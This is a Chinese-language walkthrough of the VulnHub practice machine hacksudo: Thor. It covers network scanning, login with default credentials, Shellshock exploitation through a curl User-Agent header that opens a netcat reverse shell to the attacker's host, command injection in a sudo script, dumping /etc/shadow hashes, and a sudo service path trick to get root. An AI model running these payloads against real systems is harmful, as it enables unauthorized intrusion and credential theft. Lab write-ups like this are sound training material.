靶机:hacksudo---Thor

准备工作

靶机攻略

发现目标

使用常规工具:

  • arp-scan
  • nmap
  • netdiscover
  • fping

初步扫描 sudo arp-scan -l -I eth1

┌──(kali㉿kali)-[~]

└─$ sudo arp-scan -l -I eth1

[sudo] kali 的密码:

Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116

Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)

192.168.56.100  08:00:27:bf:0e:ee       PCS Systemtechnik GmbH

192.168.56.121  08:00:27:56:af:01       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel

Ending arp-scan 1.9.8: 256 hosts scanned in 2.182 seconds (117.32 hosts/sec). 3 responded

使用 nmap 对发现 IP 进行端口扫描 nmap -A -T4 192.168.56.121

┌──(kali㉿kali)-[~]

└─$ nmap -A -T4 192.168.56.121

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-02 20:35 CST

Nmap scan report for 192.168.56.121

Host is up (0.0011s latency).

Not shown: 998 closed tcp ports (conn-refused)

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

| ssh-hostkey:

|   2048 3736603e26ae233fe18b5d18e7a7c7ce (RSA)

|   256 349a57607d6670d5b5ff4796e0362375 (ECDSA)

|_  256 ae7deefe1dbc994d54453d6116f86c87 (ED25519)

80/tcp open  http    Apache httpd 2.4.38 ((Debian))

|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

|_http-server-header: Apache/2.4.38 (Debian)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.66 seconds
  • 22/tcp 经典 SSH 服务
  • 80/tcp 也是经典 http 服务
  • 系统上是 Debian

信息收集

让我们访问一下 http://192.168.56.121:80/

  • http://192.168.56.121/home.php 登录页面,目前没有足够信息,这个系统大致是银行管理系统
  • http://192.168.56.121/news.php 其中部分是银行的新闻或消息
  • http://192.168.56.121/contact.php 其中的信息可以收集,或许后面可以做为字典素材
  • http://192.168.56.121/contact.php#about 看不到

以上内容进行源码解读

  • http://192.168.56.121/home.php 有两段 JavaScript 代码

    function respFunc() {
    
    var x = document.getElementById("theTopNav");
    
    console.log(x);

    if (x.className === "topnav") {
    
        x.className += " responsive";
    
        return 0;
    
    }

    if (x.className === "topnav navbar-fixed") {
    
        x.className += " responsive";
    
        return 0;
    
    }

    if (x.className === "topnav responsive") {
    
        x.className = "topnav";
    
        return 0;
    
    }

    if (x.className === "topnav navbar-fixed responsive" || x.className === "topnav responsive navbar-fixed") {
    
        x.className = "topnav navbar-fixed";
    
        return 0;
    
    }
    
}

// Function below is jquery-3 function used for making the navbar sticky
    
$(document).ready(function() {
    
$(window).scroll(function () {
    
    if ($(window).scrollTop() > 120) {
    
    $("#theTopNav").addClass('navbar-fixed');
    
    }
    
    if ($(window).scrollTop() < 121) {
    
    $("#theTopNav").removeClass('navbar-fixed');
    
}
    
});
    
});
    

    var old_time = 0;
    
var count = 1;
    
var eEgg_flag = false;

var modal = document.getElementById('eEgg_modal');
    
var footer = document.getElementById('footer');

function eEgg_func(){
    
    var d = new Date();
    
    var n = d.getTime();
    
    var new_time = Math.ceil(n/1000);

    if ((new_time - old_time) <= 1) {
    
        count++;
    
    }
    
    else {
    
        count = 1;
    
    }
    
    old_time = new_time;

    if (count > 7 && !eEgg_flag) {
    
        modal.style.display = "block";
    
        eEgg_flag = true;

        // Timeout
    
        setTimeout(function () {
    
            modal.style.display = "none";
    
        }, 21000);

        //Timeout text display in the footer
    
        var now = new Date().getTime();
    
        var countDownDate = now + 21000;

        setInterval(function() {
    
        // Get todays date and time
    
        var now = new Date().getTime();

        // Find the distance between now an the count down date
    
        var distance = countDownDate - now;

        // Time calculations for seconds
    
        var seconds = Math.floor((distance % (1000 * 60)) / 1000);

        // Display the result in the element with id="demo"
    
        document.getElementById("footer").innerHTML =
    
                            "Going back in "+ seconds + "s...";
    
        }, 1000);
    
    }
    
}
    • 对登录界面内容做简单校验的

  • http://192.168.56.121/news.php 中有段注释,此页面可以运用了 cgi 技术

    <!-- cgi-bin ---!>
    • CGI 是Web 服务器运行时外部程序的规范,按 CGI 编写的程序可以扩展服务器功能
    • CGI 应用程序能与浏览器进行交互,还可通过数据库API 与数据库服务器等外部数据源进行通信,从数据库服务器中获取数据
    • 应该存在一个 cgi-bin 目录用于存放相关脚本

其他的没有什么意义,下一步我们继续目录爆破 dirsearch -u http://192.168.56.121/

┌──(kali㉿kali)-[~]

└─$ dirsearch -u http://192.168.56.121/                                                     

  _|. _ _  _  _  _ _|_    v0.4.2

 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/192.168.56.121/-_22-12-02_21-02-33.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-12-02_21-02-33.log

Target: http://192.168.56.121/

[21:02:33] Starting:

[21:02:36] 403 -  279B  - /.ht_wsr.txt

... ...

[21:02:38] 403 -  279B  - /.php

[21:02:46] 200 -    4KB - /README.md

[21:03:06] 200 -    1KB - /admin_login.php

[21:03:09] 302 -    7KB - /admin_home.php  ->  home.php

[21:03:29] 403 -  279B  - /cgi-bin/

[21:03:35] 200 -    4KB - /contact.php

[21:03:51] 301 -  316B  - /fonts  ->  http://192.168.56.121/fonts/

[21:03:54] 200 -  472B  - /header.php

[21:03:56] 200 -    5KB - /home.php

[21:03:58] 200 -    4KB - /images/

[21:03:58] 301 -  317B  - /images  ->  http://192.168.56.121/images/

[21:04:00] 200 -    5KB - /index.php

[21:04:00] 200 -    5KB - /index.php/login/

[21:04:26] 200 -    8KB - /news.php

[21:04:59] 403 -  279B  - /server-status

[21:05:00] 403 -  279B  - /server-status/                                   

Task Completed
  • 有意思的文件 /README.md

我们查看其内容,从中有很多有意思的信息

## Disclaimer

<b><i>This project should not be modified in any way and used anywhere else without my permission.</b></i>

If you use this project for phishing purposes after modifying the source code / or by any other means, remember that the original project has nothing to do with phishing or any other malicious purpose. Any loss of data or unauthorized access which happened because of such phishing kits would not be my responsibility as that is not my original code. Strict legal action would be taken if someone is found modifying it and using it for any unethical purpose.

# Online Banking System

A web based banking system with all essential features and security accompanied by a beautiful and simple website. The website is designed in accordance with google material design and resposive web design guidelines to ensure a seamless experience between devices.

A fictional name of "Dolphin Bank" has been used only for representative purposes.

## Built with

<b>HTML5, CSS, JavaScript</b> & <b>jQuery</b> used for front-end design.

<b>PHP7 & MySQL</b> used for back-end design.

<b>Oracle MySQL</b> has been used to create and host the database for the

internet banking website.

Other than the languages/tools mentioned above <b>no</b> other/external

libraries and/or web-page templates have been used, everything has been

coded from ground-up straight from scratch.

## How to build/use

Setup an environment which supports web development like <b>LAMP</b> on <b>Linux</b> systems OR install <b>WampServer/XAMPP</b> or anything similar on <b>Windows</b>.

Copy the folder [net-banking](https://github.com/zakee94/online-banking-system/tree/master/net-banking) or the files in it to the location of the localhost. For example "/var/www/html", the loaction of localhost in Ubuntu.

Import the [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql) database into your MySQL setup.

Edit the file [connect.php](https://github.com/zakee94/online-banking-system/blob/master/net-banking/connect.php) and give proper username and password of your MySQL setup.

Open a browser and test wether the setup works or not by visiting the home page. Type "localhost/home.php" as the URL in the browser to visit the home page.

All the passwords and the usernames of both the admin and the customer can be found in the database i.e. in the file [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql).

However some important usernames and passwords are provided below :

* Username of admin is "admin" & password is "password123".

* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".

Some useful links to help in proper setup :

* [Installing LAMP](https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu-14-04)

* [WampServer](http://www.wampserver.com/en/)

* [Importing database in MySQL](https://www.digitalocean.com/community/tutorials/how-to-import-and-export-databases-and-reset-a-root-password-in-mysql)

## Details about the project

An exhaustive list of features, documentation, design hierarchy, details about the web pages, database, design characterstics/features and a lot more can be found [here](https://drive.google.com/open?id=1Px2shjcmyLUv7-u5wp93HvKT_zvw-Pmk).

The ER Diagram can also be found on the link given above or can be viewed [here](https://drive.google.com/open?id=1Tn2fBR9IjLP8dlv6svrc4aEvryrYcI3G).

## Description of the various folders

- <b>/net-banking :</b> Contains the source code of the website

    - <b>/net-banking/images :</b> Contains various images and icon vectors used as resources in the website

    - <b>/net-banking/fonts :</b> Contains various fonts(.ttf files) used in the website

## Screenshots (more can be found [here](https://drive.google.com/open?id=1bLLNyEiVGoWgHDfOehGooYSAZUNtj85F))

![](https://drive.google.com/uc?id=1XAImOcjlkVbGv3OVcLtfZJKIG4jIh9D_)

![](https://drive.google.com/uc?id=1wPAlZ-QhjwOJMP4L7Bi7kEGbmcLS3Qaa)

## Authors

* [zakee94](https://github.com/zakee94/)

  • 使用技术 HTML5、CSS、JavaScript、jQuery、PHP7、MySQL、Oracle MySQL

  • 部分默认配置,其中密码和账号特点,还有 net_banking.sql 这个重要文件存在

    All the passwords and the usernames of both the admin and the customer can be found in the database i.e. in the file [net_banking.sql]
    
However some important usernames and passwords are provided below :
    
* Username of admin is "admin" & password is "password123".
    
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".

  • 潜在目录,在访问 /net-banking 发现此应用没有限制 Index of

    ## Description of the various folders
    
- <b>/net-banking :</b> Contains the source code of the website
    
    - <b>/net-banking/images :</b> Contains various images and icon vectors used as resources in the website
    
    - <b>/net-banking/fonts :</b> Contains various fonts(.ttf files) used in the website

  • 更佳凶残和激进的策略是对 https://github.com/zakee94/online-banking-system 中的项目进行解读

从中提取的重要文件

  • net-banking 目录
  • net_banking.sql 数据库到 MySQL 设置中,管理员和客户的所有密码和用户名都可以在数据库中找到
  • connect.php
  • 账号密码信息 admin password123

尝试账号和密码

  • /admin_login.php
  • /home.php

其中在 /admin_login.php 成功登录,并且在登录后

  • http://192.168.56.121/customer_add.php 存在明显 sql 注入漏洞
  • http://192.168.56.121/manage_customers.php 直接四个账号信息,也有明显 sql 注入漏洞
  • 结合 https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql 中 sql 格式攻击更佳,但目前不需要我们已经是管理员,下面就是片段 net_banking.sql 内容与四个账号信息对应,已经控制金额转账
INSERT INTO `customer` VALUES

    (1,'Nafees','Zakee','male','1994-11-28',123456789,'zakee.nafees@gmail.com','+91 8918722499','22/10, Secondary Road, Durgapur - 713204','delhi',1122334455,1234,'zakee94','nafees123'),

    (2,'Md Salman','Ali','male','1994-10-11',987654321,'ali.salman@gmail.com','+966 895432167','Al Ahsa Street Malaz, King Abdulaziz Rd, Alamal Dist. RIYADH 12643-2121.','riyadh',1133557788,1234,'salman','salman123'),

    (3,'Tushar','Kr. Pandey','male','1995-02-03',125656765,'tusharpkt@gmail.com','+334 123456987','Champ de Mars, \r\n5 Avenue Anatole France, \r\n75007 Paris, France','paris',1122338457,1357,'tushar','tushar123'),

    (4,'Jon','Snow','male','1985-02-03',129156787,'jon.snow@gmail.com','+1 8918332797','The Night Watch,\r\nKing in the North,\r\nThe North Remembers,\r\nWesteros.','newyork',1233556739,1234,'jon','snow123');

下一步,我们回到 /cgi-bin/ 进行爆破,使用 dirsearch -u http://192.168.56.121/cgi-bin/ -f -e cgi,sh

┌──(kali㉿kali)-[~]

└─$ dirsearch -u http://192.168.56.121/cgi-bin/ -f -e cgi,sh

  _|. _ _  _  _  _ _|_    v0.4.2

 (_||| _) (/_(_|| (_| )                                                                                                            

Extensions: cgi, sh | HTTP method: GET | Threads: 30 | Wordlist size: 16514

Output File: /home/kali/.dirsearch/reports/192.168.56.121/-cgi-bin-_22-12-02_22-05-06.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-12-02_22-05-06.log

Target: http://192.168.56.121/cgi-bin/

[22:05:07] Starting:

[22:05:11] 403 -  279B  - /cgi-bin/.ht_wsr.txt

[22:05:11] 403 -  279B  - /cgi-bin/.htaccess.bak1

[22:05:11] 403 -  279B  - /cgi-bin/.htaccess.save

[22:05:11] 403 -  279B  - /cgi-bin/.htaccess.orig

[22:05:11] 403 -  279B  - /cgi-bin/.htaccess.sample

[22:05:11] 403 -  279B  - /cgi-bin/.htpasswds

[22:05:11] 403 -  279B  - /cgi-bin/.htaccess_extra

[22:05:11] 403 -  279B  - /cgi-bin/.htaccessOLD2

[22:05:11] 403 -  279B  - /cgi-bin/.htpasswd_test

[22:05:11] 403 -  279B  - /cgi-bin/.htaccess_sc

[22:05:11] 403 -  279B  - /cgi-bin/.htaccessOLD

[22:05:11] 403 -  279B  - /cgi-bin/.html

[22:05:11] 403 -  279B  - /cgi-bin/.htaccessBAK

[22:05:11] 403 -  279B  - /cgi-bin/.httr-oauth

[22:05:11] 403 -  279B  - /cgi-bin/.htaccess_orig

[22:05:11] 403 -  279B  - /cgi-bin/.htm

[22:05:14] 403 -  279B  - /cgi-bin/.php

[22:06:32] 500 -  612B  - /cgi-bin/backup.cgi

[22:08:56] 500 -  612B  - /cgi-bin/shell.sh                                 

Task Completed

500 明显是服务端错误,一般这种情况都是参数提交错误

  • /cgi-bin/backup.cgi
  • /cgi-bin/shell.sh

我们使用 nmap 进行验证我们的想法 nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.56.121

┌──(kali㉿kali)-[~]

└─$ nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.56.121                         1 ⨯

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-02 22:15 CST

Nmap scan report for 192.168.56.121

Host is up (0.00090s latency).

PORT   STATE SERVICE VERSION

80/tcp open  http    Apache httpd 2.4.38 ((Debian))

| http-shellshock:

|   VULNERABLE:

|   HTTP Shellshock vulnerability

|     State: VULNERABLE (Exploitable)

|     IDs:  CVE:CVE-2014-6271

|       This web application might be affected by the vulnerability known

|       as Shellshock. It seems the server is executing commands injected

|       via malicious HTTP headers.

|

|     Disclosure date: 2014-09-24

|     Exploit results:

|       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

|   <html><head>

|   <title>500 Internal Server Error</title>

|   </head><body>

|   <h1>Internal Server Error</h1>

|   <p>The server encountered an internal error or

|   misconfiguration and was unable to complete

|   your request.</p>

|   <p>Please contact the server administrator at

|    webmaster@localhost to inform them of the time this error occurred,

|    and the actions you performed just before this error.</p>

|   <p>More information about this error may be available

|   in the server error log.</p>

|   <hr>

|   <address>Apache/2.4.38 (Debian) Server at 192.168.56.121 Port 80</address>

|   </body></html>

|

|     References:

|       http://www.openwall.com/lists/oss-security/2014/09/24/10

|       http://seclists.org/oss-sec/2014/q3/685

|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169

|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

|_http-server-header: Apache/2.4.38 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds
  • shellshock 漏洞的存在是可以肯定 CVE:CVE-2014-6271
  • 测试 /cgi-bin/shell.sh 也同样存在
  • 在上面利用方法也给出

我们使用 curl http://192.168.56.121/cgi-bin/backup.cgi -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'"

┌──(kali㉿kali)-[~]

└─$ curl http://192.168.56.121/cgi-bin/backup.cgi -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'"

/usr/bin/nc
  • 雀实存在

先开启 nc -nvlp 4444 使用 curl http://192.168.56.121/cgi-bin/backup.cgi -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 192.168.56.116 4444'"

┌──(kali㉿kali)-[~]

└─$ nc -nvlp 4444

listening on [any] 4444 ...

connect to [192.168.56.116] from (UNKNOWN) [192.168.56.121] 33482

id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

升级 shell 使用 python3 -c 'import pty;pty.spawn("/bin/bash")'

账号提取

首先检测 sudo 配置 sudo -l

bash-4.3$ sudo -l

sudo -l

Matching Defaults entries for www-data on HackSudoThor:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on HackSudoThor:

    (thor) NOPASSWD: /home/thor/./hammer.sh
  • 我们可以无条件执行 /home/thor/./hammer.sh

参数 /home/thor/./hammer.sh

bash-4.3$ sudo -u thor /home/thor/./hammer.sh

sudo -u thor /home/thor/./hammer.sh

HELLO want to talk to Thor?

Enter Thor  Secret Key :
  • 需要输入

随意输入继续测试

bash-4.3$ sudo -u thor /home/thor/./hammer.sh

sudo -u thor /home/thor/./hammer.sh

HELLO want to talk to Thor?

Enter Thor  Secret Key : id

id

Hey Dear ! I am id , Please enter your Secret massage : id

id

uid=1001(thor) gid=1001(thor) groups=1001(thor)

Thank you for your precious time!

bash-4.3$
  • 发现在第二次的输入内容会做为命令执行
  • 并且命令以 thor 执行

那么我们执行的 id 换成 bash 即可获得 thor 的 shell

HELLO want to talk to Thor?

id

bash

id

uid=1001(thor) gid=1001(thor) groups=1001(thor)

python3 -c 'import pty;pty.spawn("/bin/bash")'

thor@HacksudoThor:/usr/lib/cgi-bin$

查看 thor 的 sudo 配置

thor@HacksudoThor:/usr/lib/cgi-bin$ sudo -l

sudo -l

Matching Defaults entries for thor on HackSudoThor:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User thor may run the following commands on HackSudoThor:

    (root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
  • 发现有 /usr/bin/cat, /usr/sbin/service 两个 root 的权限

我们能查看 /etc/shadow

thor@HacksudoThor:/usr/lib/cgi-bin$ sudo cat /etc/shadow

sudo cat /etc/shadow

root:$6$1YV0h.2rYTAvcB.o$cLPgAevmbnBo8dtADheWYcIfGLg157gfrCzZsKqv268MDkimBW7JcnQK6sI79fXsa1Hm5GmP8Kni05w.2nJfc0:18838:0:99999:7:::

daemon:*:18789:0:99999:7:::

bin:*:18789:0:99999:7:::

sys:*:18789:0:99999:7:::

sync:*:18789:0:99999:7:::

games:*:18789:0:99999:7:::

man:*:18789:0:99999:7:::

lp:*:18789:0:99999:7:::

mail:*:18789:0:99999:7:::

news:*:18789:0:99999:7:::

uucp:*:18789:0:99999:7:::

proxy:*:18789:0:99999:7:::

www-data:*:18789:0:99999:7:::

backup:*:18789:0:99999:7:::

list:*:18789:0:99999:7:::

irc:*:18789:0:99999:7:::

gnats:*:18789:0:99999:7:::

nobody:*:18789:0:99999:7:::

_apt:*:18789:0:99999:7:::

systemd-timesync:*:18789:0:99999:7:::

systemd-network:*:18789:0:99999:7:::

systemd-resolve:*:18789:0:99999:7:::

systemd-coredump:!!:18789::::::

messagebus:*:18789:0:99999:7:::

sshd:*:18789:0:99999:7:::

mysql:!:18790:0:99999:7:::

ftpuser:!:18793:0:99999:7:::

thor:$6$W4fXVS7OotxxqyVR$VP6iBANtcJIBt5.eI6qHFH1ho.xTtsISGiKj2uRkc.DH1NfPw54FImt28S8rKpn0PhlfHL3VYSAVNmZWws98X1:18838:0:99999:7:::

thor@HacksudoThor:/usr/lib/cgi-bin$
  • 直接看到 root 密码的加密,我们可以进行破解,但效率比较低

其实 /usr/sbin/service 这个才是致命的,我们使用 sudo service ../../bin/bash

thor@HacksudoThor:/usr/lib/cgi-bin$ sudo service ../../bin/bash

sudo service ../../bin/bash

bash-4.3# id

id

uid=0(root) gid=0(root) groups=0(root)

到此,便结束了 GAME OVER

靶机练习: hacksudo---Thor的更多相关文章

  1. vulnhub靶场之HACKSUDO: THOR

    准备: 攻击机:虚拟机kali.本机win10. 靶机:hacksudo: Thor,下载地址:https://download.vulnhub.com/hacksudo/hacksudo---Tho ...

  2. vulnhub靶场之HACKSUDO: PROXIMACENTAURI

    准备: 攻击机:虚拟机kali.本机win10. 靶机:hacksudo: ProximaCentauri,下载地址:https://download.vulnhub.com/hacksudo/hac ...

  3. vulnhub靶场之HACKSUDO: SEARCH

    准备: 攻击机:虚拟机kali.本机win10. 靶机:hacksudo: search,下载地址:https://download.vulnhub.com/hacksudo/hacksudo-sea ...

  4. vulnhub靶场之HACKSUDO: 2 (HACKDUDO)

    准备: 攻击机:虚拟机kali.本机win10. 靶机:hacksudo: 2 (HackDudo),下载地址:https://download.vulnhub.com/hacksudo/hackdu ...

  5. Codeforces Round #366 (Div. 2) C Thor(模拟+2种stl)

    Thor 题意: 第一行n和q,n表示某手机有n个app,q表示下面有q个操作. 操作类型1:app x增加一条未读信息. 操作类型2:一次把app x的未读信息全部读完. 操作类型3:按照操作类型1 ...

  6. Codeforces Round #366 (Div. 2)_C. Thor

    C. Thor time limit per test 2 seconds memory limit per test 256 megabytes input standard input outpu ...

  7. Codeforces Round #366 (Div. 2) C. Thor (模拟)

    C. Thor time limit per test 2 seconds memory limit per test 256 megabytes input standard input outpu ...

  8. CTF线下防御战 — 让你的靶机变成“铜墙铁壁”

    本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...

  9. Ms17-010进行WEB提权之实践下某培训靶机服务器

    前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...

  10. metasploit利用漏洞渗透攻击靶机

    1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...

随机推荐

  1. Swoole 实践篇之结合 WebSocket 实现心跳检测机制

    原文首发链接:Swoole 实践篇之结合 WebSocket 实现心跳检测机制 大家好,我是码农先森. 引言 前段时间在 Swoole 的交流群里,有群友提问:"如何判断用户端是否在线&qu ...

  2. 用Yacht管理docker容器

    今天是六一儿童节,祝大小朋友们节日快乐! 从今天开始起,防范区的上海市民可以自由出入小区了.始于愚人节,终于儿童节,整整两个月时间,终于迎来了期盼已久的自由和正常. 周一上午的的核酸可能是我们最后一次 ...

  3. Vue3.0极速入门(三) - 登录demo

    Talk is cheap, Show the code · 在完成npm和vue的环境安装,并了解了基本的目录和文件结构以后,直接写一个带登录和首页的demo做示例,快速了解一个vue工程的创建和基 ...

  4. LlamaFS自组织文件管理器

    LlamaFS是一个自组织文件管理器.它可以基于文件内容和修改时间等属性自动重命名和组织您的文件.它能让你不把时间花在对文件的复制.粘贴.重命名.拷贝.排序等简单操作上.有幸在Github上看到Lla ...

  5. 查看CentOS版本的方法

    1.以下命令对于Linux发行版是通用的: root@MyMail ~ # uname Linux root@MyMail ~ # uname -r 2.6.18-164.el5 [root@loca ...

  6. xshell 自动断开连接的解决方法

    1. 问题分析 本文Xshell连接自动断开的原因是SSH配置文件的ClientAliveInterval字段设置的超时断开时间小于Xshell的检查断开连接时间. 2. SSH配置文件中的字段详解 ...

  7. Understanding Swift’s value type thread safety - 代码分析(一)

    结构体并不代表线程安全,swift在此上未做保证 func testScenarioA() throws { var store: Int = 0 DispatchQueue.concurrentPe ...

  8. 多项分布模拟及 Seaborn 可视化教程

    多项分布 简介 多项分布是二项分布的推广,它描述了在 n 次独立试验中,k 种不同事件分别出现次数的离散概率分布.与二项分布只能有两种结果(例如成功/失败)不同,多项分布可以有 k 种(k ≥ 2)及 ...

  9. JavaSE数组

    目录 数组 概念 如何创建数组 数组的访问与迭代 二维数组 定义: 数组的声明 数组创建(会自动进行初始换为0) 数组遍历 数组 概念 ​ 在Java中,数组是一种用于存储多个相同类型元素的数据结构. ...

  10. xhs全参xs,xt,xscommon逆向分析

    声明 本文章中所有内容仅供学习交流,抓包内容.敏感网址.数据接口均已做脱敏处理,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关,若有侵权,请联系我立即删除! 目标网站 aHR0cHM6 ...